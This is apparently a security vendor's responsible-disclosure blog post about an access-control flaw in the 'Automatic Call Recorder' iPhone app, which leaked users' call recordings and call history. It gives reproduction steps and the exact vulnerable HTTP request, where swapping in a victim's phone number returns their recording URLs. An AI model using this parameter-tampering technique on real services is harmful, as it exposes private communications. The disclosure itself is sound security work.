How we could have listened to anyone's call recordings
Bug Bounty Research

How we could have listened to anyone's call recordings

March 10, 2021

Note:

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe AI and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.
"Automatic call recorder" application is one of the popular application used by iPhone users to record their calls.
The app is among top grossing in the Business category of App Store currently #15 in the downloads in the Business Category worldwide.

Summary:
Anand with the help of PingSafe AI's threat intelligence product discovered this vulnerability while doing open source intelligence across mobile applications in different categories. PingSafe AI decompiled the IPA file and figured out S3 buckets, host names and other sensitive details used by the application.
The vulnerability allowed any malicious actor to listen to any user's call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim's data.

Vulnerability Details:
This vulnerability existed in the "/fetch-sinch-recordings.php" API endpoint of the "Automatic Call Recorder" application. An attacker can pass another user's number in the recordings request and the API will respond with recording url of the storage bucket without any authentication. It also leaks victim's entire call history and the numbers on which calls were made.

Steps to Reproduce:
1) Install "Automatic Call Recorder" application in your phone.
2) Intercept application's traffic in Burp Suite/Zap Proxy.
3) You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php change UserID to victim's phone number with country code.

4) Response will have s3 url for the recording and other sensitive details.


Vulnerable Request:

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}

Response:


HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]




Timelines:
Feb 27th, 2021 09:20 PM IST - Vulnerability discovered by Anand Prakash from PingSafe AI
Feb 27th, 2021 10:34 PM IST-  The company did not have any responsible disclosure program. Reached out to Zack Whittaker for help in the responsible disclosure. Issue forwarded to the developer.
March 6th, 2021 1:16 AM IST - Confirmation from TechCrunch that the new build will get published anytime soon by the developer.
March 6th, 2021 08:52 PM IST - Bug is fixed and new version is made live on App Store.

Security issues like this are catastrophic in nature. Along with impacting customer's privacy, these also dents the company's image and provides added advantage to the competitors.
PingSafe AI uses the state of the art intelligent risk evaluation engine to monitors the security health of a company comprehensively by assessing all domains, IPs, mobile applications, sources codes and leaked credentials.

Follow us on LinkedIn and Twitter to get more details.

Other blog posts